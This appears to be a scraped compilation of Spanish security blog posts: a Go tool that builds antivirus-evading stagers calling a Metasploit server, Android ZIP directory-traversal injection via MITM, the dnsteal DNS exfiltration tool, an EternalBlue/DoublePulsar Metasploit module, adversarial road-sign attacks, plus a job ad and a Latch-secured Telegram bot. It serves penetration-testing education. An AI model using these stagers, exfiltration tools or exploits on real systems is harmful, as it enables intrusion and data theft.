Tester Jobs Requirements (VIDEO GAME)

Metasploit tiene dos excelentes m�dulos dise�ados para actualizar una simple shell a Meterpreter mediante una llamada a un servidor Web o servidor SMB. El primer m�dulo es exploit/multi/script/web_delivery y el otro es exploit/windows/smb/smb_delivery.  Utilizando estos m�dulos se puede ejecutar un comando Powershell, PHP, Python o Rundll para actualizar el shell existente a meterpreter.

Pero, �qu� sucede si no tenemos previamente una shell y s�lo podemos llamar a un ejecutable?. Podr�amos crear un meterpreter u otro payload pero al subirlo y escribirlo en disco es muy probable que el antivirus lo detecte. Pero, �y si creamos un ejecutable muy simple que s�lo haga la llamada necesaria a web_delivery o smb_delivery y luego cargue meterpreter en memoria? Este ejecutable probablemente no ser� detectado por el AV...

El script stealth.go hace exactamente eso. Toma unos pocos par�metros, el tipo de payload deseado, el servidor Metasploit y el puerto, y un nombre de carpeta y crea un peque�o ejecutable de Golang que hace la llamada apropiada a Metasploit.

Para usar el script necesitaremos una versi�n reciente de Golang y seguir unos sencillos pasos:

1.- Configura el m�dulo Metasploit web_delivery o smb_delivery seg�n lo deseado. Ten en cuenta que para el m�dulo web_delivery se necesita establecer el par�metro URIPATH y en el m�dulo smb_delivery se debe establecer el par�metro SHARE y dejar sin configurar el par�metro FOLDER_NAME.

2.- Ejecuta el m�dulo stealth.go para crear un binario llamado shell (* nix) o shell.exe (Windows):

    go run stealth.go ps 10.10.10.1 8080 test

Esto construir� un ejecutable que har� una llamada de Powershell para descargar y ejecutar c�digo desde http://10.10.10.1:8080/test.

  go run stealth.go smb 10.10.10.1 445 test

Y esto construir� un ejecutable que har� una llamada rundll32 a 10.10.10.1 est y ejecutar� el payload entregado.

3.- Ejecuta shell o shell.exe y comprueba en Metasploit si tenemos la sesi�n Meterpreter.

El c�digo stealth.go se puede encontrar en Github:  https://github.com/averagesecurityguy/scripts/blob/master/stealth.go

Fuente: Bypassing AntiVirus with Golang

En la BlackHat London 2015 el investigador Ryan Welton mostr� c�mo se pod�a hacer directory traversal a trav�s de inyecciones ZIP en dispositivos Android. Mi compa�ero Fran Ramirez (@cyberhadesblog) y yo hemos estado ojeando esta t�cnica estos d�as. La idea es muy sencilla, un archivo ZIP creado de forma maliciosa puede permitir a un potencial atacante escribir un archivo arbitrario en secciones no controladas del sistema operativo Android. Y cuando decimos arbitrario, queremos decir en una ubicaci�n para la cual la app que lo ejecuta no tendr�a acceso a priori.

Figura 1: Hacking Android. Ataques de "Directory Trasversal" con ficheros ZIP

Como se puede ver, la idea presentada por Ryan Welton es sencilla a la vez que interesante. Podemos generar un ZIP que extraiga los archivos subiendo varios niveles de la carpeta d�nde se encuentra. Esto ser�a f�cil a trav�s de la sintaxis �../�. Si el fichero ZIP no es gestionado de forma adecuada, esto podr�a permitirnos escribir fuera del directorio de extracci�n, es decir, escribir un archivo en otra ubicaci�n, incluida otra aplicaci�n. Esta t�cnica no es nueva, y en el a�o 2010, en el blog Seguridad Apple, ten�amos ejemplos de estos trucos en herramientas como ZipEg para MacOS.

Figura 2: Ejemplo de manipulaci�n de fichero ZIP con nombres ../../../../

C�mo se explic� en la charla de BlackHat muchas apps descargan recursos en formato ZIP, por lo que un atacante podr�a intentar colocarse en medio de una comunicaci�n en una red y obtener ventaja modificando el ZIP que se descarga la app leg�tima y sustituirlo por un ZIP malicioso. Hay que tener en cuenta siempre los permisos de la carpeta donde queremos ubicar los ficheros inyectados. Si las rutas son directorios de sistema, ser� necesario que la aplicaci�n o proceso que descomprima el fichero ZIP tenga permisos necesarios.

Figura 3: Remotely Abusing Android [PDF]

En el ejemplo mostrado por Ryan Welton, �ste inyecta un fichero en unos de los ZIP que se descarga una aplicaci�n de la Google Play Store (�My Talking Tom�) y que luego se descomprime autom�ticamente al ejecutarse (desde el proceso �PackageInstaller� de Android) el fichero APK donde se encuentra la misma. De esta forma garantizamos que al menos en la carpeta donde se instala la aplicaci�n podemos inyectar nuestro c�digo modificado o incluso sustituir alguna librer�a o m�dulo del programa original como hemos mencionado antes.

Escenarios posibles

Los escenarios pueden ser distintos, por lo que vamos a ver distintos casos que se detallan en la charla de Ryan Welton:

� El caso base: Aplicaci�n vulnerable y que no comprueba nada en la extracci�n del ZIP. Ante este caso la escritura del archivo malicioso en la ubicaci�n deseada es casi segura. 

� Comprobaci�n del hash del ZIP esperado: En algunas aplicaciones se descubri� que comprobaban el hash del ZIP a descargar, por lo que, si �ste era manipulado en su descarga, no se proced�a con la extracci�n. 

Figura 4: Validaci�n de Hash en fichero descargado

� Manifest: En algunas aplicaciones que comprobaban el hash del ZIP, se enviaba una especie de manifest, un archivo JSON, en el que se pod�a ver el hash esperado. Esta petici�n tambi�n se realizaba por HTTP, por lo que se pod�a llevar a cabo la modificaci�n previa de dicho JSON.

Probando la inyecci�n

En primer lugar, hablamos del entorno que se ha montado para llevar a cabo esta prueba.

� M�quina con Kali Linux 2.
� MITMProxy versi�n 0.18.2 para la inyecci�n del ZIP manipulando el tr�fico.
� Dispositivo m�vil Android.
� 4 m�quinas virtuales de Android, entre las que est�n la 7.1, 6.0, 5.1.0 Y 4.4.1.
� BusyBox 1.22 en las m�quinas virtuales.
� BusyBox 1.26.2 en el dispositivo Android.

El procedimiento llevado a cabo es utilizar MITMProxy para ver el tr�fico generado por la app. Nosotros hemos querido ejemplificar este hecho, para que se vea claro.

Figura 5: Interceptando el tr�fico con MITMProxy

En el siguiente video se puede ver MITMProxy mostrando las peticiones que se realizan, y en el instante en el que se quiere descargar un ZIP de una ubicaci�n X, se lleva a cabo la modificaci�n o inyecci�n del ZIP malicioso por el leg�timo.


Viendo esto est� claro que se puede manipular de forma sencilla este tr�fico. Una vez la aplicaci�n descarga el archivo ZIP modificado, depende de los permisos o mecanismos de seguridad que se tengan para proteger la extracci�n y la ubicaci�n d�nde se pondr�n los ficheros que se encuentran en el interior del ZIP.

Para esta PoC hemos utilizado el c�digo publicado en la art�culo de We Live Security cambiando solamente el formato de decodificaci�n de UTF-8 a ISO-8859-1 y el �payload�. Este script de mitmproxy detecta el tr�fico de red, en concreto analiza las cabeceras GET de http/https y cuando detecta un fichero con los caracteres �PK� en los primeros dos bytes (cualquier fichero en formato ZIP) activa inyecci�n.

Figura 7: Script para hacer inyecci�n de ZIP en MITMProxy

La rutina �response� se encarga de detectar los ficheros y tambi�n es aqu� donde definimos las rutas de inyecci�n. La rutina �injectIntoZip� por otro lado, se encarga de insertar el fichero con nuestro payload (en nuestro caso el fichero �zipizape�) dentro del fichero ZIP interceptado. En vez de utilizar directamente mitmproxy hemos optado por la versi�n mitmdump, para poder mostrar los mensajes de salida (�Found ZIP� y �Zip injected�) una vez se ha realizado la inyecci�n como puede observarse en la imagen anterior. El funcionamiento de mitmproxy y mitmdump es id�ntico, s�lo tienen como diferencia la informaci�n que muestran en pantalla.

Unzip en BusyBox

En todos los sistemas Android donde hemos realizado las pruebas se ha utilizado el programa �unzip� integrado en Busybox. �ste es b�sicamente un paquete de aplicaciones que re�ne las utilidades y comandos m�s comunes de UNIX (como por ejemplo el mencionado �unzip�) en un �nico fichero binario. Muchos sistemas GNU/Linux llevan por defecto una versi�n de este paquete debido a su gran utilidad.


La primera curiosidad que nos encontramos es que en funci�n de la versi�n de Busybox que se est� utilizando, la inyecci�n a trav�s del ZIP funciona o no lo hace. En estos videos se pueden ver las diferentes posibilidades, con la versi�n 1.22 y con la versi�n 1.26.2.


Interesante charla y concepto de inyecci�n a trav�s de los ficheros ZIP. La posibilidad de tener o aprovechar un Directory Traversal en sistemas como Android es un concepto interesante. Por supuesto, hay sistemas parcheados y otros muchos Android que est�n expuestos a este tipo de ataques o t�cnicas, y, l�gicamente, dependiendo de las medidas de seguridad que pongan las apps para descargar los ZIP ser�n vulnerables o no a estos ataques. Adem�s, estos trucos podr�an empezar a ser utilizados por el malware para Android para ocultarse mejor en el sistema.

Autores: Pablo Gonz�lez P�rez (@pablogonzalezpe), escritor de los libros "Metasploit para Pentesters", "Ethical Hacking", "Got Root" y �Pentesting con Powershell�, Microsoft MVP en Seguridad y Security Researcher en ElevenPaths y Fran Ramirez (@cyberhadesblog) escritor de libro "Microhistorias: an�cdotas y curiosidades de la historia de la inform�tica" e investigador en ElevenPaths

Dnsteal es una herramienta de exfiltraci�n de datos de DNS, esencialmente un servidor DNS falso que permite extraer de forma furtiva archivos de la m�quina de una v�ctima a trav�s de peticiones DNS.

Est� programado en Python y est� disponible en Github:

https://github.com/m57/dnsteal


Sus caracter�sticas principales son:

 - Soporte para varios archivos
 - Compresi�n Gzip soportada
 - Soporta la personalizaci�n de subdominios
 - Permite personalizar bytes por subdominio y la longitud del nombre de archivo

Uso:

# cd dnsteal/
# ./dnsteal.py -h
 
      ___  _  _ ___ _            _ 
     |   | | / __| |_ ___ __ _| |
     | |) | .` __   _/ -_) _` | |
     |___/|_|_|___/_______,_|_|v2.0
 
-- https://github.com/m57/dnsteal.git --
 
Stealthy file extraction via DNS requests
 
Usage: python ./dnsteal.py [listen_address] [options]
 
Options:
        -z      Unzip incoming files.
        -v      Verbose output.
        -h      This help menu
 
Advanced:
        -b      Bytes to send per subdomain                 (default = 57, max=63)
        -s      Number of data subdomains per request       (default =  4, ie. $data.$data.$data.$data.$filename)
        -f      Length reserved for filename per request    (default = 17)
 
$ python ./dnsteal.py -z 127.0.0.1
 
-------- Do not change the parameters unless you understand! --------
 
The query length cannot exceed 253 bytes. This is including the filename.
The subdomains lengths cannot exceed 63 bytes.
 
Advanced: 
        ./dnsteal.py 127.0.0.1 -z -s 4 -b 57 -f 17      4 subdomains, 57 bytes => (57 * 4 = 232 bytes) + (4 * . = 236). Filename => 17 byte(s)
        ./dnsteal.py 127.0.0.1 -z -s 4 -b 55 -f 29      4 subdomains, 55 bytes => (55 * 4 = 220 bytes) + (4 * . = 224). Filename => 29 byte(s)
        ./dnsteal.py 127.0.0.1 -z -s 4 -b 63 -f  1      4 subdomains, 63 bytes => (62 * 4 = 248 bytes) + (4 * . = 252). Filename =>  1 byte(s)
 
 
# 

Descarga: dnsteal.py

Este mes de Abril ElevenPaths ha cumplido cuatro a�os, y dentro de poco har� un a�o desde que me nombraron Chief Data Officer en Telef�nica, para que me ocupara de los proyectos de Big Data en la casa, tanto los de transformaci�n interna en la 4th Plataforma, como el lanzamiento de la unidad Luca-D3, y, como sab�is, comenc� a trabajar en una plataforma de Inteligencia Artificial que internamente hab�a denominado YOT (You On Telef�nica) y que al final se cristaliz� en Aura.

Todos esos proyectos est�n en plena evoluci�n, creciendo y a pleno rendimiento, as� que hemos abierto unas decenas de nuevas posiciones para todos aquellos que ador�is crear tecnolog�a. Desde puestos de Software Developer, hasta expertos en Natural Language Processing, pasando por Devops, Data Scientist, Security Analysts, etc�tera. Este es un detalle resumen de las posiciones que tenemos abiertas para trabajar en nuestro equipo. Ten en cuenta que de algunas de estas posiciones buscamos a m�s de un hacker.

Todas estas posiciones, m�s las que se abren en otras �reas de Telef�nica est�n en nuestro portal Jobs at Telef�nica, donde puedes tener el detalle completo de cada uno de los puestos, y en esta URL en concreto tienes acceso a los roles que est�n en nuestra unidad. 

Ya sabes que en nuestros equipos esto va de crear clavos, de hacer tecnolog�a, y de pas�rselo bien. Eso s�, te prometo que vas tener deadlines, que hacer deliveries, que lo que crees es para que sea utilizado, y que te vamos a pedir que lo hagas mucho mejor cada d�a. Si buscas un trabajo en el que no te vayas a ver retado y se te vaya a exigir que seas mejor cada d�a... este NO es tu sitio.

Figura 4: Vente a crear tecnolog�a a la f�brica de caramelos

Si a�n as� te animas a venirte a crear tecnolog�a a nuestra particular f�brica de caramelos, recuerda que el plazo de selecci�n es este mes de Mayo, as� que el tiempo apremia. Entra en la web y aplica al puesto, que estamos ya seleccionando los hackers para roles, y los procesos de entrevistas toman su tiempo.

Saludos Malignos!

Como es sabido, una de las funcionalidades atractivas y muy utilizadas en Telegram es la posibilidad de crear e interactuar con bots. La API para crear bots de Telegram es p�blica y justamente por eso es posible encontrar much�simas implementaciones de bots creados para ella tambi�n de forma p�blica.

Figura 1: Un bot de Telegram protegido por Latch en un Datacenter...

Un bot de Telegram es un programa que se ejecuta en un sistema propio (un sistema del tipo C&C) y que realiza las acciones que el usuario le solicite a trav�s de mensajes, llamados �ordenes�, enviados desde la cuenta del mismo Telegram por chat y con en el siguiente formato: /help, /ping, /lo_que_se_desee_hacer. Ya hemos visto ejemplos en varios art�culos aqu�:

- Pi Guardian: Video-Vigilancia controlada por un bot de Telegram
- Usar bots de Telegram para crear una botnet
- Controlar Sinfonier con un bot de Telegram

Los bots son una gran herramienta a la hora de querer difundir informaci�n entre miembros de un grupo de usuarios. Al utilizar Telegram como canal de comunicaci�n, se aprovecha del cifrado de la conexi�n del chat, y permite utilizar cuentas an�nimas, es decir sin la necesidad de identificar a los usuarios reales o a la organizaci�n que lo ha implementado. E incluso puedes seguir este blog "El lado del mal" por Telegram.


Todo hace pensar que es ideal entonces para administraciones remotas. Sin embargo, a pesar de las ventajas de este modelo, existe un gran desaf�o al momento de querer crear un bot que brinde acceso a datos o servicios sensibles de una organizaci�n porque, por defecto, no se permite autenticaci�n y autorizaci�n de usuarios. Es decir, dada ciertas condiciones, cualquier persona puede agregarse a un grupo y acceder a datos sensibles del mismo.


Una posible soluci�n ser�a no utilizar bots para manipular informaci�n confidencial y, si bien este acercamiento es cierto en la mayor�a de los escenarios, deber�amos plantearnos �qu� sucede si realmente queremos maximizar los beneficios y posibilidades que brindan los bots para ejecutar tareas sencillas y repetitivas (aunque a�n confidenciales)?

Un bot de Telegram protegido con Latch en un Datacenter

El equipo t�cnico del DataCenter de Telef�nica de Argentina est� compuesto por personas que se hacen este tipo de preguntas y que intentan buscarles respuestas, y por ello crearon un bot que permite agregar un m�todo de autenticaci�n y autorizaci�n robusto mediante la utilizaci�n de una herramienta conocida por los lectores de este blog: Latch.

La soluci�n se basa en integrar un middleware para sistemas internos - sistemas de monitoreo, medici�n de consumos energ�ticos, temperaturas, sistemas de ticketing, etc�tera - con un bot de Telegram, que pueda ser consultado desde los tel�fonos m�viles del personal que, previamente, debe acceder a ellos mediante Latch que actuar� como Segundo Factor de Autorizaci�n.

Figura 4: Configuraci�n de la app de Latch para controlar el bot de Telegram

Las ventajas son muchas. Una vez que el usuario se haya autenticado y aprobado su acceso, puede ejecutar tareas directamente sobre los sistemas internos del CPD y de esta manera se puede automatizar y acelerar el tratamiento de tareas rutinarias y repetitivas, minimizar el tiempo que un operador debe pasar dentro del centro o frente a una consola, garantizar que todas estas tareas son realizadas por personal autorizado.

Como siempre, existe una primera fase de alta y validaci�n de usuarios que ser�n agregados al grupo de Telegram y luego se usa Latch para evitar transmitir datos que tienen cierto nivel de sensibilidad, de forma no autorizada. Si un usuario �cierra� su Latch, la aplicaci�n informa que �alguien� ha intentado acceder a su cuenta y se bloquea el acceso. El proceso de creaci�n de esta interesante implementaci�n, ser�a de la siguiente manera:

Figura 5: C�digo para integrar Latch en nuestro bot de Telegram

Antes que nada registrarse en Latch como desarrollador y crear una aplicaci�n. Es bueno recordar que no es necesario brindar ning�n dato que nos relacione a una organizaci�n, el correo electr�nico o el tel�fono, los datos son solo representativos y sirven para obtener el Application ID y el Secret de la aplicaci�n creada. Ahora puedes gestionar hasta los permisos que quieres dar a cada Secret. En este ejemplo tienes un paso a paso de c�mo integrar una aplicaci�n web con Latch.

Figura 6: SDK de Latch para lenguaje Python

En el bot de Telegram se utilizan estos datos para procesar la validaci�n del usuario de Latch. En este caso el c�digo del bot propiamente dicho est� creado en Python por lo que es necesario descargar la el SDK Python correspondiente de Latch y luego realizar la autenticaci�n a trav�s de los datos obtenidos previamente (app_id y secret_key):

Figura 7:  Control de ejecuci�n de �rdenes con Latch

Una vez creado el bot de Telegram, se debe proceder a programar la integraci�n con Latch y agregar las ordenes que se desee que el bot lleve a cabo. El bot tiene una serie de par�metros y opciones que deber�n ser agregados y que servir�n para interactuar con el mismo. Por ejemplo, en este caso �/remedio� servir�a para descargar e instalar una actualizaci�n determinada en el sistema operativo.

Funcionamiento del bot de Telegram protegido por Latch

Ya con todo el desarrollo terminado, as� es como se ve la interacci�n del usuario (operador), para ejecutar tareas en el centro de datos a trav�s del bot de Telegram que se ha creado, protegido con Latch.

Figura 8: El bot ejecuta el comando porque el Latch est� abierto

Y as� se ver�a el resultado al momento de cerrar el Latch para un usuario determinado, es decir, deshabilitar la autorizaci�n para que ejecute acciones y por tanto el bot no las ejecutar�.

Figura 9: Operaci�n denegada por el bloqueo de Latch

Como puede verse, es sencillo crear un servicio que utilice un bot de Telegram para intercambiar informaci�n con un grupo de usuarios previamente autorizados con Latch y de esa forma potenciar el uso de ambas herramientas para realizar tareas sencillas, obteniendo un gran beneficio para todos. Por ejemplo, obtener el estado de un servidor o ejecutar un proceso urgente a distancia y, al mismo tiempo, proteger informaci�n sensible de la organizaci�n.

Autor: Claudio Caracciolo (@holesec)
CSA de ElevenPaths en Argentina

El pasado viernes 14 de Abril - viernes santo en Espa�a - The Shadow Brokers public� una gran cantidad de herramientas pertenecientes al Arsenal de la NSA. Se puede encontrar dichas herramientas en el repositorio de Github de misterch0c.

Figura 1: Hackear Windows 7 & Windows Server 2008 R2 con ternalblue y Doublepulsar de ShadowBroker usando Metasploit

Mi compa�era en ElevenPaths Sheila A. Berta (@UnaPibaGeek) public� en Exploit-DB un paper, tambi�n con versi�n en ingl�s, en el que se explica c�mo explotar la vulnerabilidad Eternalblue & Doublepulsar para obtener una Shell apoy�ndose en Powershell Empire para lograr, posteriormente, un Meterpreter de Metasploit. Gran trabajo, sin duda, de Sheila.


Sheila formul� una pregunta interesante en su paper y es: �Por qu� Eternalblue & Doublepulsar? La respuesta es sencilla, ya que entre los exploits que se publicaron, Eternalblue es el �nico que se puede utilizar para atacar sistemas Windows 7 y Windows Server 2008 R2 sin necesidad de autenticaci�n. Por lo que, Eternalblue es el exploit que nos permitir� aprovecharnos de un fallo de seguridad en el protocolo SMB para que, posteriormente, Doublepulsar pueda inyectar remotamente, por ejemplo, una DLL, ya que existen otras posibilidades.

Figura 3: Lista de exploits para Windows publicados por Shadowbroker

Dichoe esto, el pasado jueves mis compa�eros Sheila y Claudio Caracciolo (@holesec) me preguntaron por la posibilidad de hacer una migraci�n del exploit Eternalblue que es utilizado en Fuzzbunch en el leak a mi querido Metasploit. El gusto por la seguridad y por la tecnolog�a nos puede y nos pusimos de forma r�pida y �gil manos a la obra en ElevenPaths.

Tras revisar paso a paso el trabajo de Sheila, empec� a hacer mis peque�as pruebas. El pasado jueves no sab�amos bien qu� cosa hac�a el exploit de Eternalblue, y observando Fuzzbunch vimos que lo �nico que hacen es lanzar el binario contra un target concreto. No tenemos el c�digo del exploit para poder portarlo completamente. Entonces, el plan era migrar la configuraci�n de los binarios y la ejecuci�n de �stos para que desde Metasploit se pudiera hacer. Manos a la obra.

FuzzBunch: Loader de binarios

Analizando FuzzBunch te das cuenta que se genera una serie de ficheros XML asociados a un proyecto en curso y que esos ficheros XML son los que tienen los par�metros y opciones con las que se lanzan los binarios, en este caso, exploits o payloads. El primer objetivo era entender bien los archivos XML, ver qu� era lo necesario y poder ejecutar el binario sin utilizar FuzzBunch.

De los tres ficheros XML que se generan, acab� viendo que el importante es el de InConfig o configuraci�n de entrada, ya que es el que el exploit lee para poder ejecutarse. En la imagen siguiente puede verse como, al lanzar el binario por s� solo, no se encuentra el fichero XML de configuraci�n y el exploit no es lanzado. Sin embargo, cuando le ponemos el fichero XML correctamente, el binario es lanzado con la configuraci�n indicada en el archivo de configuraci�n InConfig.

Figura 4: Ejemplo sn y con el fichero InConfig.xml

En la siguiente imagen, se puede ver el contenido del fichero InConfig.XML para Eternalblue. En �l se indican los tipos de datos, las posibilidades y los valores que tienen los atributos o variables.

Figura 5: Contenido de InConfig.XML

Analizando esto llegamos a una conclusi�n: Podr�amos hacer un m�dulo de Metasploit que implemente la configuraci�n del XML de Eternalblue, posteriormente el de Doublepulsar que ser� muy similar, generar una DLL con el Payload que el usuario elija en Metasploit y lanzar ambos binarios, el exploit y el paylaod.

Otro problema: �Windows?

Por el camino surgi� otro problema, y es que el exploit Eternalblue y Doublepulsar son binarios para Windows. Le pregunt� a Sheila y ella me contest� "�Qui�n utiliza Metaspoit en Windows?". Con la boca chica pens� en confesar que yo algunas veces (te toca torear en pelear en el campo de batalla que te toca), pero ella estaba en lo cierto, generalmente Metasploit se utiliza en sistemas Linux. Adem�s, nosotros quer�amos hacerlo con nuestro querido Kali Linux.

La respuesta aqu� no se hizo esperar, nos tocar�a tirar de Wine para que el m�dulo de Metasploit lo utilice y pueda lanzar los binarios con sus configuraciones. Hay que tener en cuenta que para que el m�dulo funcione correctamente en sistemas Kali Linux tenemos que tener instalado Wine con compatibilidad para binarios de 32 bits.

Detectar v�ctimas vulnerables a Eternalblue

El pasado martes 17 de Abril se public� un m�dulo auxiliary de Metasploit que permite detectar en una red si alguno de los equipos es vulnerable al CVE-2017-010, es decir, a Eternalblue. Decid� probar el m�dulo y ver un poco c�mo estaba hecho y la sensaci�n es que la liberaci�n del c�digo del exploit est� muy cerca.

Figura 6:  Uso del modulo auxiliary (cve-2017-010) en Metasploit

Si eres un personal de IT te recomendamos que apliques los parches de seguridad para esta vulnerabilidad lo antes posible las m�quinas de tu empresa o dominio, ya que es una vulnerabilidad cr�tica que podr�a ser explotada por cualquiera, al no requerir la interacci�n por parte del usuario, solamente disponer de conectividad con la m�quina.

Nuestro m�dulo para Metasploit: eternalblue_doublepulsar o eternal11

La historia del nombre del m�dulo nos dar�a para otro art�culo entre Sheila y yo, pero baste decir que le pusimos eternal11. El algoritmo utilizado para este caso os lo dejo aqu� en un sencillo pseudoc�digo:

� Disponemos de un SKELETON del fichero XML de Eternalblue. Este SKELETON contiene una serie de palabras clave, por ejemplo %RPORT%, %RHOST%, %TIMEOUT%.

Figura 7: Skeleton.XML de Eternalblue

� Cada vez que invocamos la funci�n exploit este fichero es copiado con el nombre Eternalblue-2.2.0.xml, el cual es el que utiliza el binario para leer los valores.

� Una vez copiado el fichero con el nombre original, se sustituye en el fichero las palabras clave por los valores que el usuario introduzca en los atributos de Metasploit. Por ejemplo, si el usuario configura RHOST apuntando a la direcci�n 10.0.0.10, el campo %RHOST% del fichero XML ser� sustituido por la direcci�n IP real. As� ocurre con todos los campos. 

� Ocurre igual con el XML de Doublepulsar. Tenemos un SKELETON d�nde se ir�n sustituyendo los valores, en este caso los valores personalizables son: %RHOST%, %RPORT%, %TIMEOUT%, %TARGETARCHITECTURE%, %DLLPAY%, %PROCESSINJECT%. 

� A continuaci�n, se genera una DLL con el Payload que se haya setteado con Set PAYLOAD. La DLL se almacenar� d�nde se indique en el atributo PathDLLInjection del m�dulo. 

� Despu�s, se lanzan los binarios: primero Eternalblue y despu�s Doublepulsar.

El m�dulo desarrollado tiene las siguientes opciones avanzadas:

� TargetArchitecture: Podr� elegirse entre x86 y x64. Le indica a Doublepulsar la arquitectura d�nde inyectar� la DLL. 

� PathEternalBlue: Indica la ruta d�nde se encuentra el binario de Eternalblue. Hay que recordar que el sistema, si estamos en Linux, debe contar con Wine. Por otro lado, hay que tener cuidado con las dependencias que tiene el binario, librer�as en x86 o x64, tienen que ser accesibles por el binario, y por Wine en el caso de Linux. 

� PathDoublePulsar: Indica la ruta d�nde se encuentra el binario de Doublepulsar. 

� PathDLLInjection: Indica la ruta d�nde se almacenar� la DLL. Adem�s, este path se incluir� en el XML de Doublepulsar para que el binario sepa de d�nde cargarla. � NameDLL. Nombre que se le dar� a la DLL. Por defecto es eternal11.dll. 

� ProcessInject: Proceso en el que se har� la inyecci�n de la DLL.

Y por fin, cuando lancemos el m�dulo contra un sistema vulnerable al CVE-2017-010 de Windows 7 o Windows Server 2008R2 veremos algo parecido a esto que pod�is ver en la imagen siguiente.

Figura 8: Explotaci�n con �xito del m�dulo de eternal11 sobre un Windows vulnerable

Ha sido divertido pasar unas horas locas trabajando en esto e intentando hacer un m�dulo que pueda ayudar a auditar los sistemas Microsoft d�nde Eternalblue sigue presente. En el siguiente v�deo tienes una demostraci�n de este m�dulo funcionando.

Y tambi�n la tienes disponible la PoC para los equipos Windows 7 y Windows Server 2008 R2 en versiones x64, que tambi�n funciona, como pod�is ver en este v�deo.


Actualiza lo antes posible todos tus sistemas Microsoft Windows vulnerables y prot�gete de las amenazas que han surgido con este leak de exploits. Quiero agradecer el trabajo de mi compa�era Sheila A. Berta y como viene en la descripci�n del m�dulo:

Autor: Pablo Gonz�lez P�rez (@pablogonzalezpe)
Escritor de los libros "Metasploit para Pentesters", "Ethical Hacking", "Got Root" y �Pentesting con Powershell�, Microsoft MVP en Seguridad y Security Researcher en ElevenPaths

Cada d�a somos testigos de nuevos avances en la conducci�n aut�noma de veh�culos. Muchas empresas presentan prototipos y algunos incluso ya lo tienen en producci�n como Tesla autopilot. Estos veh�culos son capaces de analizar el entorno que les rodea y de esa forma conducir por ellos mismos, sin intervenci�n humana alguna.

Figura 1: Veh�culos aut�nomos hackeados con falsas se�ales de tr�fico

Los veh�culos aut�nomos se basan principalmente en la informaci�n que recogen multitud de sus sensores. Pero la informaci�n m�s importante, al igual que ocurre con el ser humano, es la que llega a trav�s de sus sensores de visi�n. En concreto son las c�maras las que recopilan las im�genes para luego ser procesadas por algoritmos de reconocimiento visual y tomar decisiones en base a ellas.

Por lo tanto, si conocemos o simulamos el algoritmo utilizado para clasificar im�genes, se podr�a manipular la imagen de origen para enga�arlo y modificar la acci�n a realizar por el sistema que est� utilizando dicho algoritmo. Esto es justamente lo que han realizado investigadores de la Universidad de Washington, Michigan, Stony Brook y Berkeley. Han encontrado varias formas de enga�ar a los algoritmos de visi�n utilizando t�cnicas bastante simples como, por ejemplo, colocar pegatinas en las se�ales de tr�fico.


Figura 2: Ejemplo veh�culo Tesla en modo autopilot
Para poder �perturbar� el mundo f�sico y as� confundir a la Inteligencia Artificial prepararon dos tipos de ataques que asombran por su sencillez de implementaci�n:

1. Utilizando posters, es posible imprimir una se�al, introducir las modificaciones y superponerla a la original. 

2. Utilizando pegatinas, las cuales se colocan sobre se�ales reales.

Para que dichas perturbaciones no fueran detectadas por observadores humanos, se camuflaron en forma de actos vand�licos t�picos como grafitis o mensajes, en el caso de las pegatinas. Para los posters, se imprime la misma se�al original, pero se introducen modificaciones muy sutiles y dif�ciles de ver para un observador humano. Todo esto utilizando s�lo una c�mara y una impresora a color.

Figura 3: Ejemplo de poster sobre una se�al de STOP, a diferentes distancias y �ngulos, con detalles borrosos y difuminados en su superficie que ofrecen otra lectura a la IA

Las consecuencias de esta investigaci�n son realmente alarmantes viendo los resultados obtenidos. Utilizando el m�todo de los posters cubrieron la se�al, la cual parece la original, pero se a�adieron ligeras zonas un poco difuminadas de forma superficial o sutil simulando alg�n tipo de pintura hecha con pintura de spray. El algoritmo de visi�n en funci�n de los �ngulos y distancia, podr�a confundirla con otra se�al de limitaci�n de velocidad por ejemplo a 45 millas por hora, provocando que el coche acelerara o directamente no parara en el STOP. Tambi�n probaron esta t�cnica en otras se�ales confundiendo las que indicaban giro con STOP.

Utilizando el segundo m�todo en el cual se utilizan simples pegatinas, las colocaron de manera estrat�gica en una se�al de STOP de forma que formaran la palabra LOVE y HATE. Esta combinaci�n provocaba en m�s de la mitad de los casos, combinando los diferentes algoritmos de ataque, que la IA encargada de conducir el veh�culo pensara que era una se�al de limitaci�n de velocidad en vez de un STOP (y algunas veces la confund�a con una se�al de ceda el paso).

Figura 4: Ejemplo de pegatinas sobre una se�al de STOP, a diferentes distancias y �ngulos, con las palabras Love y Hate para disimular pero que ofrecen una lectura distinta a la IA

La pregunta es �c�mo se puede llegar a realizar este tipo de ataque? Todos los sistemas de visi�n artificial para veh�culos aut�nomos, tienen dos componentes fundamentales, un detector de objetos y un clasificador. El detector de objetos es capaz de detectar peatones, las luces de la carretera, las se�ales de tr�fico, otros veh�culos, etc. El clasificador se encarga en analizar los objetos detectados por el detector e identificarlos (clasificarlos). Por ejemplo, el detector detecta una se�al de tr�fico en una calle y el clasificador la identifica como una se�al de STOP. Es en este clasificador donde se centra el estudio y donde se materializa el ataque.

Por otro lado, hay tres componentes que tienen un gran impacto en el algoritmo clasificador y que ser�n objetivo principal de los atacantes a la hora de analizar el comportamiento del mismo. Estos son la distancia, el �ngulo y la resoluci�n de la imagen. La distancia es importante ya que a medida que el veh�culo se acerca o se aleja, va obteniendo diferentes capturas de la se�al con mayor o menor detalle y una perturbaci�n a�adida en esta fase puede dar varias lecturas en funci�n de la distancia.

El �ngulo es tambi�n importante, ya que no hay una sola c�mara en un veh�culo aut�nomo, por lo tanto, la perturbaci�n en la se�al de tr�fico debe de ser capaz de enga�ar al clasificador con capturas tomadas desde diferentes �ngulos. Y finalmente la resoluci�n, la cual puede variar por diferentes factores como por ejemplo el clima (lluvia, niebla, etc.) y por lo tanto se podr�an obtener diferentes lecturas de la se�al original.

Figura 5: Ejemplo de poster sobre una se�al de giro a la derecha a�adiendo perturbaciones, a diferentes distancias y �ngulos

Para hacer la PoC, crearon su propio clasificador utilizando t�cnicas habituales basadas en redes neuronales (DNNs, Deep Neural Network). Una base de datos con se�ales (47 utilizadas en USA) fue utilizada para generar el dataset de entrada. Para entrenar la red neuronal y escribir el clasificador utilizaron herramientas y t�cnicas ampliamente utilizadas como el famoso Tensorflow y Adadelta. El nivel de acierto del clasificador lleg� al 91%.

